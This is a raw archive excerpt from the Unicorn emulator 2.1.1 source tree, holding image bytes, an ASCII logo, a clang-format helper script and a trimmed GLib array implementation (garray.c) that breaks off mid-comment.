6B&rs>VUrmtbq|<`mXHߠ&w33JĥZb#@vgp_r+ѻ٠mJFX]0ۀFUC=dy g-V/Ӑ3-wS(SX^w/_E}?6Qa<L;9ҠDAC!0RqX2 i\s&(1ϖpŖ\2 4F9#~2TЭrâ;( ,D5TWZ\ta4+\֧gi�̬%R Z3`!*ٔf?[)RDO'(wcLOtϱ:L. {�~N0Vve n ^,I4v;8ul~7Hϐ +>2bJ|~OAسߔy<X技My(#rXJ3�j۸]IeHs0/W s#a4xczE M$u!+ 2 ''t~e2c$"31r-=ZYRAVHZ}`ʔJyJ6  lf>7G9&+خzʖ%<TÂ9ZC0;Gd xq=3`? .Zd</&ܢ! ^c^zKՕ !T S1Y-q;ҋOL:чy!5d'[w%D2[@är*R9``Rd~:6Kb,;}&$7Q*eD2s8[AĠd~H.$^W*PqUI|ewX1"<҈&ɜm uҩpΐwHdh/V-ǶпoI-~)RkVy 2kd(UBp(Zy,PR(J6ʀ#o*BWGߖ_O`iPLq~Z6)S{Ҝ{2?.O4L+il<=ūHY ՟AgNam֚غ|H.T nԴ djJcmu\l*΅\2X"!< @ d3{Rul6?=֥.rT)Hݘ?W5F#%teEWܕUrPW;öx96g1hp_ưh9% 82g;_t:HQ ;``A0kP7œ2ZilM9Փy fH%zQl|ԙٔ.m{[n,X�.<0EZ-*:@`d9(&a.`@FˋJe//sLx֖֧qK]i@(䏝Ls%X,8,"^:zs=+R:֕|/ѻxJ䰡Ru.ykȇzF[�&5 {nHY/_SEvJ6݇Ԏ@h t51\B:7c\oF^Ř䕽RlV2`!djkC\>>"S>q ",;{9Uqn`kmW ^FGt"dӉ~zr}%|%giHXPVBѐr r] Ik/8S^_۸YַmQ }O>:Z)!d䅀J@9_D@H A i DGHrJ$j8a :qim[C;/{wE>D"("("("("("("("("("BN1y����IENDB`���������������������������������unicorn-2.1.1/docs/unicorn1-logo.txt����������������������������������������������������������������0000664�0000000�0000000�00000001067�14675241067�0017375�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ /\'. _,. |:\ \. .'_/ _.- |(\\ \ .'_.' _.-' ,__\\ \\_),/ _/ _:.' .:::::::.___ ,' // ' ./::::::\<o\( // /|::/ `"( \ ;/_ / ::( `. `. /_'/ | ::::\ `. \ '// '\ :::':\_ _, ` _'- / | '\.:/|::::.._ `-__ )/ | | \;| \:( '.(_ \_) | | \( \::. '-) \ \ , '""""---. \ \ \ , _.-...) \ \/\. \:,___.-'..:::/ \ |\\:,.\:::::'.::::/ ` `:;::::'.::;::' '":;:""' �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/format.sh�����������������������������������������������������������������������������0000664�0000000�0000000�00000001266�14675241067�0015035�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/bash find . -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";" find ./msvc -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";" find ./include -maxdepth 2 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";" find ./tests/unit -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";" find ./samples -maxdepth 1 "(" -name "*.c" -or -name "*.h" ")" -exec clang-format -i -style=file "{}" ";" find ./qemu "(" -name "unicorn.c" -or -name "unicorn.h" -or -name "unicorn_arm.c" -or -name "unicorn_aarch64.c" ")" -exec clang-format -i -style=file "{}" ";" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/��������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015464�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/README��������������������������������������������������������������������0000664�0000000�0000000�00000000121�14675241067�0016336�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������This is a compatible glib library, customized for Unicorn. Based on glib 2.64.4. �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/glib_compat/garray.c������������������������������������������������������������������0000664�0000000�0000000�00000134577�14675241067�0017136�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* GLIB - Library of useful routines for C programming * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Modified by the GLib Team and others 1997-2000. See the AUTHORS * file for a list of people on the GLib Team. See the ChangeLog * files for a list of changes. These files are distributed with * GLib at ftp://ftp.gtk.org/pub/gtk/. */ /* * MT safe */ //#include "config.h" #include <string.h> #include <stdlib.h> #include "glib_compat.h" #define g_mem_gc_friendly FALSE /** * SECTION:arrays * @title: Arrays * @short_description: arrays of arbitrary elements which grow * automatically as elements are added * * Arrays are similar to standard C arrays, except that they grow * automatically as elements are added. * * Array elements can be of any size (though all elements of one array * are the same size), and the array can be automatically cleared to * '0's and zero-terminated. * * To create a new array use g_array_new(). * * To add elements to an array, use g_array_append_val(), * g_array_append_vals(), g_array_prepend_val(), and * g_array_prepend_vals(). * * To access an element of an array, use g_array_index(). * * To set the size of an array, use g_array_set_size(). * * To free an array, use g_array_free(). * * Here is an example that stores integers in a #GArray: * |[<!-- language="C" --> * GArray *garray; * gint i; * // We create a new array to store gint values. * // We don't want it zero-terminated or cleared to 0's. * garray = g_array_new (FALSE, FALSE, sizeof (gint)); * for (i = 0; i < 10000; i++) * g_array_append_val (garray, i); * for (i = 0; i < 10000; i++) * if (g_array_index (garray, gint, i) != i) * g_print ("ERROR: got %d instead of %d\n", * g_array_index (garray, gint, i), i); * g_array_free (garray, TRUE); * ]| */ #define MIN_ARRAY_SIZE 16 typedef struct _GRealArray GRealArray; /** * GArray: * @data: a pointer to the element data. The data may be moved as * elements are added to the #GArray. * @len: the number of elements in the #GArray not including the * possible terminating zero element. * * Contains the public fields of a GArray. */ struct _GRealArray { guint8 *data; guint len; guint alloc; guint elt_size; guint zero_terminated : 1; guint clear : 1; // gatomicrefcount ref_count; GDestroyNotify clear_func; }; /** * g_array_index: * @a: a #GArray * @t: the type of the elements * @i: the index of the element to return * * Returns the element of a #GArray at the given index. The return * value is cast to the given type. * * This example gets a pointer to an element in a #GArray: * |[<!-- language="C" --> * EDayViewEvent *event; * // This gets a pointer to the 4th element in the array of * // EDayViewEvent structs. * event = &g_array_index (events, EDayViewEvent, 3); * ]| * * Returns: the element of the #GArray at the index given by @i */ #define g_array_elt_len(array,i) ((array)->elt_size * (i)) #define g_array_elt_pos(array,i) ((array)->data + g_array_elt_len((array),(i))) #define g_array_elt_zero(array, pos, len) \ (memset (g_array_elt_pos ((array), pos), 0, g_array_elt_len ((array), len))) #define g_array_zero_terminate(array) G_STMT_START{ \ if ((array)->zero_terminated) \ g_array_elt_zero ((array), (array)->len, 1); \ }G_STMT_END static guint g_nearest_pow (guint num); static void g_array_maybe_expand (GRealArray *array, guint len); /** * g_array_new: * @zero_terminated: %TRUE if the array should have an extra element at * the end which is set to 0 * @clear_: %TRUE if #GArray elements should be automatically cleared * to 0 when they are allocated * @element_size: the size of each element in bytes * * Creates a new #GArray with a reference count of 1. * * Returns: the new #GArray */ GArray* g_array_new (gboolean zero_terminated, gboolean clear, guint elt_size) { g_return_val_if_fail (elt_size > 0, NULL); return g_array_sized_new (zero_terminated, clear, elt_size, 0); } /** * g_array_sized_new: * @zero_terminated: %TRUE if the array should have an extra element at * the end with all bits cleared * @clear_: %TRUE if all bits in the array should be cleared to 0 on * allocation * @element_size: size of each element in the array * @reserved_size: number of elements preallocated * * Creates a new #GArray with @reserved_size elements preallocated and * a reference count of 1. This avoids frequent reallocation, if you * are going to add many elements to the array. Note however that the * size of the array is still 0. * * Returns: the new #GArray */ GArray* g_array_sized_new (gboolean zero_terminated, gboolean clear, guint elt_size, guint reserved_size) { GRealArray *array; g_return_val_if_fail (elt_size > 0, NULL); array = g_slice_new (GRealArray); array->data = NULL; array->len = 0; array->alloc = 0; array->zero_terminated = (zero_terminated ? 1 : 0); array->clear = (clear ? 1 : 0); array->elt_size = elt_size; array->clear_func = NULL; // g_atomic_ref_count_init (&array->ref_count); if (array->zero_terminated || reserved_size != 0) { g_array_maybe_expand (array, reserved_size); g_array_zero_terminate(array); } return (GArray*) array; } /** * g_array_set_clear_func: * @array: A #GArray * @clear_func: a function to clear an element of @array * * Sets a function to clear an element of @array. * * The @clear_func will be called when an element in the array * data segment is removed and when the array is freed and data * segment is deallocated as well. @clear_func will be passed a * pointer to the element to clear, rather than the element itself. * * Note that in contrast with other uses of #GDestroyNotify * functions, @clear_func is expected to clear the contents of * the array element it is given, but not free the element itself. * * Since: 2.32 */ void g_array_set_clear_func (GArray *array, GDestroyNotify clear_func) { GRealArray *rarray = (GRealArray *) array; g_return_if_fail (array != NULL); rarray->clear_func = clear_func; } /** * g_array_ref: * @array: A #GArray * * Atomically increments the reference count of @array by one. * This function is thread-safe and may be called from any thread. * * Returns: The passed in #GArray * * Since: 2.22 */ GArray *g_array_ref (GArray *array) { //GRealArray *rarray = (GRealArray*) array; g_return_val_if_fail (array, NULL); // g_atomic_ref_count_inc (&rarray->ref_count); return array; } typedef enum { FREE_SEGMENT = 1 << 0, PRESERVE_WRAPPER = 1 << 1 } ArrayFreeFlags; static gchar *array_free (GRealArray *, ArrayFreeFlags); /** * g_array_unref: * @array: A #GArray * * Atomically decrements the reference count of @array by one. If the * reference count drops to 0, all memory allocated by the array is * released. This function is thread-safe and may be called from any * thread. * * Since: 2.22 */ void g_array_unref (GArray *array) { GRealArray *rarray = (GRealArray*) array; g_return_if_fail (array); // if (g_atomic_ref_count_dec (&rarray->ref_count)) array_free (rarray, FREE_SEGMENT); } /** * g_array_get_element_size: * @array: A #GArray * * Gets the size of the elements in @array. * * Returns: Size of each element, in bytes * * Since: 2.22 */ guint g_array_get_element_size (GArray *array) { GRealArray *rarray = (GRealArray*) array; g_return_val_if_fail (array, 0); return rarray->elt_size; } /** * g_array_free: * @array: a #GArray * @free_segment: if %TRUE the actual element data is freed as well * * Frees the memory allocated for the #GArray. If @free_segment is * %TRUE it frees the memory block holding the elements as well. Pass * %FALSE if you want to free the #GArray wrapper but preserve the * underlying array for use elsewhere. If the reference count of * @array is greater than one, the #GArray wrapper is preserved but * the size of @array will be set to zero. * * If array contents point to dynamically-allocated memory, they should * be freed separately if @free_seg is %TRUE and no @clear_func * function has been set for @array. * * This function is not thread-safe. If using a #GArray from multiple * threads, use only the atomic g_array_ref() and g_array_unref() * functions. * * Returns: the element data if @free_segment is %FALSE, otherwise * %NULL. The element data should be freed using g_free(). */ gchar *g_array_free (GArray *farray, gboolean free_segment) { GRealArray *array = (GRealArray*) farray; ArrayFreeFlags flags; g_return_val_if_fail (array, NULL); flags = (free_segment ? FREE_SEGMENT : 0); /* if others are holding a reference, preserve the wrapper but do free/return the data */ //if (!g_atomic_ref_count_dec (&array->ref_count)) flags |= PRESERVE_WRAPPER; return array_free (array, flags); } static gchar *array_free (GRealArray *array, ArrayFreeFlags flags) { gchar *segment; if (flags & FREE_SEGMENT) { if (array->clear_func != NULL) { guint i; for (i = 0; i < array->len; i++) array->clear_func (g_array_elt_pos (array, i)); } g_free (array->data); segment = NULL; } else segment = (gchar*) array->data; if (flags & PRESERVE_WRAPPER) { array->data = NULL; array->len = 0; array->alloc = 0; } else { g_slice_free1 (sizeof (GRealArray), array); } return segment; } /** * g_array_append_vals: * @array: a #GArray * @data: (not nullable): a pointer to the elements to append to the end of the array * @len: the number of elements to append * * Adds @len elements onto the end of the array. * * Returns: the #GArray */ /** * g_array_append_val: * @a: a #GArray * @v: the value to append to the #GArray * * Adds the value on to the end of the array. The array will grow in * size automatically if necessary. * * g_array_append_val() is a macro which uses a reference to the value * parameter @v. This means that you cannot use it with literal values * such as "27". You must use variables. * * Returns: the #GArray */ GArray* g_array_append_vals (GArray *farray, gconstpointer data, guint len) { GRealArray *array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); if (len == 0) return farray; g_array_maybe_expand (array, len); memcpy (g_array_elt_pos (array, array->len), data, g_array_elt_len (array, len)); array->len += len; g_array_zero_terminate (array); return farray; } /** * g_array_prepend_vals: * @array: a #GArray * @data: (nullable): a pointer to the elements to prepend to the start of the array * @len: the number of elements to prepend, which may be zero * * Adds @len elements onto the start of the array. * * @data may be %NULL if (and only if) @len is zero. If @len is zero, this * function is a no-op. * * This operation is slower than g_array_append_vals() since the * existing elements in the array have to be moved to make space for * the new elements. * * Returns: the #GArray */ /** * g_array_prepend_val: * @a: a #GArray * @v: the value to prepend to the #GArray * * Adds the value on to the start of the array. The array will grow in * size automatically if necessary. * * This operation is slower than g_array_append_val() since the * existing elements in the array have to be moved to make space for * the new element. * * g_array_prepend_val() is a macro which uses a reference to the value * parameter @v. This means that you cannot use it with literal values * such as "27". You must use variables. * * Returns: the #GArray */ GArray* g_array_prepend_vals (GArray *farray, gconstpointer data, guint len) { GRealArray *array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); if (len == 0) return farray; g_array_maybe_expand (array, len); memmove (g_array_elt_pos (array, len), g_array_elt_pos (array, 0), g_array_elt_len (array, array->len)); memcpy (g_array_elt_pos (array, 0), data, g_array_elt_len (array, len)); array->len += len; g_array_zero_terminate (array); return farray; } /** * g_array_insert_vals: * @array: a #GArray * @index_: the index to place the elements at * @data: (nullable): a pointer to the elements to insert * @len: the number of elements to insert * * Inserts @len elements into a #GArray at the given index. * * If @index_ is greater than the array's current length, the array is expanded. * The elements between the old end of the array and the newly inserted elements * will be initialised to zero if the array was configured to clear elements; * otherwise their values will be undefined. * * @data may be %NULL if (and only if) @len is zero. If @len is zero, this * function is a no-op. * * Returns: the #GArray */ /** * g_array_insert_val: * @a: a #GArray * @i: the index to place the element at * @v: the value to insert into the array * * Inserts an element into an array at the given index. * * g_array_insert_val() is a macro which uses a reference to the value * parameter @v. This means that you cannot use it with literal values * such as "27". You must use variables. * * Returns: the #GArray */ GArray* g_array_insert_vals (GArray *farray, guint index_, gconstpointer data, guint len) { GRealArray *array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); if (len == 0) return farray; /* Is the index off the end of the array, and hence do we need to over-allocate * and clear some elements? */ if (index_ >= array->len) { g_array_maybe_expand (array, index_ - array->len + len); return g_array_append_vals (g_array_set_size (farray, index_), data, len); } g_array_maybe_expand (array, len); memmove (g_array_elt_pos (array, len + index_), g_array_elt_pos (array, index_), g_array_elt_len (array, array->len - index_)); memcpy (g_array_elt_pos (array, index_), data, g_array_elt_len (array, len)); array->len += len; g_array_zero_terminate (array); return farray; } /** * g_array_set_size: * @array: a #GArray * @length: the new size of the #GArray * * Sets the size of the array, expanding it if necessary. If the array * was created with @clear_ set to %TRUE, the new elements are set to 0. * * Returns: the #GArray */ GArray* g_array_set_size (GArray *farray, guint length) { GRealArray *array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); if (length > array->len) { g_array_maybe_expand (array, length - array->len); if (array->clear) g_array_elt_zero (array, array->len, length - array->len); } else if (length < array->len) g_array_remove_range (farray, length, array->len - length); array->len = length; g_array_zero_terminate (array); return farray; } /** * g_array_remove_index: * @array: a #GArray * @index_: the index of the element to remove * * Removes the element at the given index from a #GArray. The following * elements are moved down one place. * * Returns: the #GArray */ GArray* g_array_remove_index (GArray *farray, guint index_) { GRealArray* array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); g_return_val_if_fail (index_ < array->len, NULL); if (array->clear_func != NULL) array->clear_func (g_array_elt_pos (array, index_)); if (index_ != array->len - 1) memmove (g_array_elt_pos (array, index_), g_array_elt_pos (array, index_ + 1), g_array_elt_len (array, array->len - index_ - 1)); array->len -= 1; if (g_mem_gc_friendly) g_array_elt_zero (array, array->len, 1); else g_array_zero_terminate (array); return farray; } /** * g_array_remove_index_fast: * @array: a @GArray * @index_: the index of the element to remove * * Removes the element at the given index from a #GArray. The last * element in the array is used to fill in the space, so this function * does not preserve the order of the #GArray. But it is faster than * g_array_remove_index(). * * Returns: the #GArray */ GArray* g_array_remove_index_fast (GArray *farray, guint index_) { GRealArray* array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); g_return_val_if_fail (index_ < array->len, NULL); if (array->clear_func != NULL) array->clear_func (g_array_elt_pos (array, index_)); if (index_ != array->len - 1) memcpy (g_array_elt_pos (array, index_), g_array_elt_pos (array, array->len - 1), g_array_elt_len (array, 1)); array->len -= 1; if (g_mem_gc_friendly) g_array_elt_zero (array, array->len, 1); else g_array_zero_terminate (array); return farray; } /** * g_array_remove_range: * @array: a @GArray * @index_: the index of the first element to remove * @length: the number of elements to remove * * Removes the given number of elements starting at the given index * from a #GArray. The following elements are moved to close the gap. * * Returns: the #GArray * * Since: 2.4 */ GArray* g_array_remove_range (GArray *farray, guint index_, guint length) { GRealArray *array = (GRealArray*) farray; g_return_val_if_fail (array, NULL); g_return_val_if_fail (index_ <= array->len, NULL); g_return_val_if_fail (index_ + length <= array->len, NULL); if (array->clear_func != NULL) { guint i; for (i = 0; i < length; i++) array->clear_func (g_array_elt_pos (array, index_ + i)); } if (index_ + length != array->len) memmove (g_array_elt_pos (array, index_), g_array_elt_pos (array, index_ + length), (array->len - (index_ + length)) * array->elt_size); array->len -= length; if (g_mem_gc_friendly) g_array_elt_zero (array, array->len, length); else g_array_zero_terminate (array); return farray; } /* Returns the smallest power of 2 greater than n, or n if * such power does not fit in a guint */ static guint g_nearest_pow (guint num) { guint n = num - 1; g_assert (num > 0); n |= n >> 1; n |= n >> 2; n |= n >> 4; n |= n >> 8; n |= n >> 16; #if SIZEOF_INT == 8 n |= n >> 32; #endif return n + 1; } static void g_array_maybe_expand (GRealArray *array, guint len) { guint want_alloc; /* Detect potential overflow */ //if ((G_MAXUINT - array->len) < len) // g_error ("adding %u to array would overflow", len); want_alloc = g_array_elt_len (array, array->len + len + array->zero_terminated); if (want_alloc > array->alloc) { want_alloc = g_nearest_pow (want_alloc); want_alloc = MAX (want_alloc, MIN_ARRAY_SIZE); array->data = g_realloc (array->data, want_alloc); if (g_mem_gc_friendly) memset (array->data + array->alloc, 0, want_alloc - array->alloc); array->alloc = want_alloc; } } /** * SECTION:arrays_pointer * @title: Pointer Arrays * @short_description: arrays of pointers to any type of data, which * grow automatically as new elements are added * * Pointer Arrays are similar to Arrays but are used only for storing * pointers. * * If you remove elements from the array, elements at the end of the * array are moved into the space previously occupied by the removed * element. This means that you should not rely on the index of particular * elements remaining the same. You should also be careful when deleting * elements while iterating over the array. * * To create a pointer array, use g_ptr_array_new(). * * To add elements to a pointer array, use g_ptr_array_add(). * * To remove elements from a pointer array, use g_ptr_array_remove(), * g_ptr_array_remove_index() or g_ptr_array_remove_index_fast(). * * To access an element of a pointer array, use g_ptr_array_index(). * * To set the size of a pointer array, use g_ptr_array_set_size(). * * To free a pointer array, use g_ptr_array_free(). * * An example using a #GPtrArray: * |[<!-- language="C" --> * GPtrArray *array; * gchar *string1 = "one"; * gchar *string2 = "two"; * gchar *string3 = "three"; * * array = g_ptr_array_new (); * g_ptr_array_add (array, (gpointer) string1); * g_ptr_array_add (array, (gpointer) string2); * g_ptr_array_add (array, (gpointer) string3); * * if (g_ptr_array_index (array, 0) != (gpointer) string1) * g_print ("ERROR: got %p instead of %p\n", * g_ptr_array_index (array, 0), string1); * * g_ptr_array_free (array, TRUE); * ]| */ typedef struct _GRealPtrArray GRealPtrArray; /** * GPtrArray: * @pdata: points to the array of pointers, which may be moved when the * array grows * @len: number of pointers in the array * * Contains the public fields of a pointer array. */ struct _GRealPtrArray { gpointer *pdata; guint len; guint alloc; // gatomicrefcount ref_count; GDestroyNotify element_free_func; }; /** * g_ptr_array_index: * @array: a #GPtrArray * @index_: the index of the pointer to return * * Returns the pointer at the given index of the pointer array. * * This does not perform bounds checking on the given @index_, * so you are responsible for checking it against the array length. * * Returns: the pointer at the given index */ static void g_ptr_array_maybe_expand (GRealPtrArray *array, guint len); /** * g_ptr_array_new: * * Creates a new #GPtrArray with a reference count of 1. * * Returns: the new #GPtrArray */ GPtrArray *g_ptr_array_new (void) { return g_ptr_array_sized_new (0); } /** * g_ptr_array_steal: * @array: a #GPtrArray. * @len: (optional) (out caller-allocates): pointer to retrieve the number of * elements of the original array * * Frees the data in the array and resets the size to zero, while * the underlying array is preserved for use elsewhere and returned * to the caller. * * Even if set, the #GDestroyNotify function will never be called * on the current contents of the array and the caller is * responsible for freeing the array elements. * * An example of use: * |[<!-- language="C" --> * g_autoptr(GPtrArray) chunk_buffer = g_ptr_array_new_with_free_func (g_bytes_unref); * * // Some part of your application appends a number of chunks to the pointer array. * g_ptr_array_add (chunk_buffer, g_bytes_new_static ("hello", 5)); * g_ptr_array_add (chunk_buffer, g_bytes_new_static ("world", 5)); * * ... * * // Periodically, the chunks need to be sent as an array-and-length to some * // other part of the program. * GBytes **chunks; * gsize n_chunks; * * chunks = g_ptr_array_steal (chunk_buffer, &n_chunks); * for (gsize i = 0; i < n_chunks; i++) * { * // Do something with each chunk here, and then free them, since * // g_ptr_array_steal() transfers ownership of all the elements and the * // array to the caller. * ... * * g_bytes_unref (chunks[i]); * } * * g_free (chunks); * * // After calling g_ptr_array_steal(), the pointer array can be reused for the * // next set of chunks. * g_assert (chunk_buffer->len == 0); * ]| * * Returns: (transfer full): the element data, which should be * freed using g_free(). * * Since: 2.64 */ gpointer *g_ptr_array_steal (GPtrArray *array, gsize *len) { GRealPtrArray *rarray; gpointer *segment; g_return_val_if_fail (array != NULL, NULL); rarray = (GRealPtrArray *) array; segment = (gpointer *) rarray->pdata; if (len != NULL) *len = rarray->len; rarray->pdata = NULL; rarray->len = 0; rarray->alloc = 0; return segment; } /** * g_ptr_array_copy: * @array: #GPtrArray to duplicate * @func: (nullable): a copy function used to copy every element in the array * @user_data: user data passed to the copy function @func, or %NULL * * Makes a full (deep) copy of a #GPtrArray. * * @func, as a #GCopyFunc, takes two arguments, the data to be copied * and a @user_data pointer. On common processor architectures, it's safe to * pass %NULL as @user_data if the copy function takes only one argument. You * may get compiler warnings from this though if compiling with GCC's * `-Wcast-function-type` warning. * * If @func is %NULL, then only the pointers (and not what they are * pointing to) are copied to the new #GPtrArray. * * The copy of @array will have the same #GDestroyNotify for its elements as * @array. * * Returns: (transfer full): a deep copy of the initial #GPtrArray. * * Since: 2.62 **/ GPtrArray *g_ptr_array_copy (GPtrArray *array, GCopyFunc func, gpointer user_data) { gsize i; GPtrArray *new_array; g_return_val_if_fail (array != NULL, NULL); new_array = g_ptr_array_sized_new (array->len); g_ptr_array_set_free_func (new_array, ((GRealPtrArray *) array)->element_free_func); if (func != NULL) { for (i = 0; i < array->len; i++) new_array->pdata[i] = func (array->pdata[i], user_data); } else if (array->len > 0) { memcpy (new_array->pdata, array->pdata, array->len * sizeof (*array->pdata)); } new_array->len = array->len; return new_array; } /** * g_ptr_array_sized_new: * @reserved_size: number of pointers preallocated * * Creates a new #GPtrArray with @reserved_size pointers preallocated * and a reference count of 1. This avoids frequent reallocation, if * you are going to add many pointers to the array. Note however that * the size of the array is still 0. * * Returns: the new #GPtrArray */ GPtrArray *g_ptr_array_sized_new (guint reserved_size) { GRealPtrArray *array; array = g_slice_new (GRealPtrArray); array->pdata = NULL; array->len = 0; array->alloc = 0; array->element_free_func = NULL; // g_atomic_ref_count_init (&array->ref_count); if (reserved_size != 0) g_ptr_array_maybe_expand (array, reserved_size); return (GPtrArray*) array; } /** * g_array_copy: * @array: A #GArray. * * Create a shallow copy of a #GArray. If the array elements consist of * pointers to data, the pointers are copied but the actual data is not. * * Returns: (transfer container): A copy of @array. * * Since: 2.62 **/ GArray *g_array_copy (GArray *array) { GRealArray *rarray = (GRealArray *) array; GRealArray *new_rarray; g_return_val_if_fail (rarray != NULL, NULL); new_rarray = (GRealArray *) g_array_sized_new (rarray->zero_terminated, rarray->clear, rarray->elt_size, rarray->alloc / rarray->elt_size); new_rarray->len = rarray->len; if (rarray->len > 0) memcpy (new_rarray->data, rarray->data, rarray->len * rarray->elt_size); g_array_zero_terminate (new_rarray); return (GArray *) new_rarray; } /** * g_ptr_array_new_with_free_func: * @element_free_func: (nullable): A function to free elements with * destroy @array or %NULL * * Creates a new #GPtrArray with a reference count of 1 and use * @element_free_func for freeing each element when the array is destroyed * either via g_ptr_array_unref(), when g_ptr_array_free() is called with * @free_segment set to %TRUE or when removing elements. * * Returns: A new #GPtrArray * * Since: 2.22 */ GPtrArray *g_ptr_array_new_with_free_func (GDestroyNotify element_free_func) { GPtrArray *array; array = g_ptr_array_new (); g_ptr_array_set_free_func (array, element_free_func); return array; } /** * g_ptr_array_new_full: * @reserved_size: number of pointers preallocated * @element_free_func: (nullable): A function to free elements with * destroy @array or %NULL * * Creates a new #GPtrArray with @reserved_size pointers preallocated * and a reference count of 1. This avoids frequent reallocation, if * you are going to add many pointers to the array. Note however that * the size of the array is still 0. It also set @element_free_func * for freeing each element when the array is destroyed either via * g_ptr_array_unref(), when g_ptr_array_free() is called with * @free_segment set to %TRUE or when removing elements. * * Returns: A new #GPtrArray * * Since: 2.30 */ GPtrArray *g_ptr_array_new_full (guint reserved_size, GDestroyNotify element_free_func) { GPtrArray *array; array = g_ptr_array_sized_new (reserved_size); g_ptr_array_set_free_func (array, element_free_func); return array; } /** * g_ptr_array_set_free_func: * @array: A #GPtrArray * @element_free_func: (nullable): A function to free elements with * destroy @array or %NULL * * Sets a function for freeing each element when @array is destroyed * either via g_ptr_array_unref(), when g_ptr_array_free() is called * with @free_segment set to %TRUE or when removing elements. * * Since: 2.22 */ void g_ptr_array_set_free_func (GPtrArray *array, GDestroyNotify element_free_func) { GRealPtrArray *rarray = (GRealPtrArray *)array; g_return_if_fail (array); rarray->element_free_func = element_free_func; } static void g_ptr_array_maybe_expand (GRealPtrArray *array, guint len) { /* Detect potential overflow */ //if ((G_MAXUINT - array->len) < len) // g_error ("adding %u to array would overflow", len); if ((array->len + len) > array->alloc) { guint old_alloc = array->alloc; array->alloc = g_nearest_pow (array->len + len); array->alloc = MAX (array->alloc, MIN_ARRAY_SIZE); array->pdata = g_realloc (array->pdata, sizeof (gpointer) * array->alloc); if (g_mem_gc_friendly) for ( ; old_alloc < array->alloc; old_alloc++) array->pdata [old_alloc] = NULL; } } /** * g_ptr_array_set_size: * @array: a #GPtrArray * @length: the new length of the pointer array * * Sets the size of the array. When making the array larger, * newly-added elements will be set to %NULL. When making it smaller, * if @array has a non-%NULL #GDestroyNotify function then it will be * called for the removed elements. */ void g_ptr_array_set_size (GPtrArray *array, gint length) { GRealPtrArray *rarray = (GRealPtrArray *)array; guint length_unsigned; g_return_if_fail (rarray); g_return_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL)); g_return_if_fail (length >= 0); length_unsigned = (guint) length; if (length_unsigned > rarray->len) { guint i; g_ptr_array_maybe_expand (rarray, (length_unsigned - rarray->len)); /* This is not * memset (array->pdata + array->len, 0, * sizeof (gpointer) * (length_unsigned - array->len)); * to make it really portable. Remember (void*)NULL needn't be * bitwise zero. It of course is silly not to use memset (..,0,..). */ for (i = rarray->len; i < length_unsigned; i++) rarray->pdata[i] = NULL; } else if (length_unsigned < rarray->len) g_ptr_array_remove_range (array, length_unsigned, rarray->len - length_unsigned); rarray->len = length_unsigned; } static gpointer ptr_array_remove_index (GPtrArray *array, guint index_, gboolean fast, gboolean free_element) { GRealPtrArray *rarray = (GRealPtrArray *) array; gpointer result; g_return_val_if_fail (rarray, NULL); g_return_val_if_fail (rarray->len == 0 || (rarray->len != 0 && rarray->pdata != NULL), NULL); g_return_val_if_fail (index_ < rarray->len, NULL); result = rarray->pdata[index_]; if (rarray->element_free_func != NULL && free_element) rarray->element_free_func (rarray->pdata[index_]); if (index_ != rarray->len - 1 && !fast) memmove (rarray->pdata + index_, rarray->pdata + index_ + 1, sizeof (gpointer) * (rarray->len - index_ - 1)); else if (index_ != rarray->len - 1) rarray->pdata[index_] = rarray->pdata[rarray->len - 1]; rarray->len -= 1; if (g_mem_gc_friendly) rarray->pdata[rarray->len] = NULL; return result; } /** * g_ptr_array_remove_index: * @array: a #GPtrArray * @index_: the index of the pointer to remove * * Removes the pointer at the given index from the pointer array. * The following elements are moved down one place. If @array has * a non-%NULL #GDestroyNotify function it is called for the removed * element. If so, the return value from this function will potentially point * to freed memory (depending on the #GDestroyNotify implementation). * * Returns: (nullable): the pointer which was removed */ gpointer g_ptr_array_remove_index (GPtrArray *array, guint index_) { return ptr_array_remove_index (array, index_, FALSE, TRUE); } /** * g_ptr_array_remove_index_fast: * @array: a #GPtrArray * @index_: the index of the pointer to remove * * Removes the pointer at the given index from the pointer array. * The last element in the array is used to fill in the space, so * this function does not preserve the order of the array. But it * is faster than g_ptr_array_remove_index(). If @array has a non-%NULL 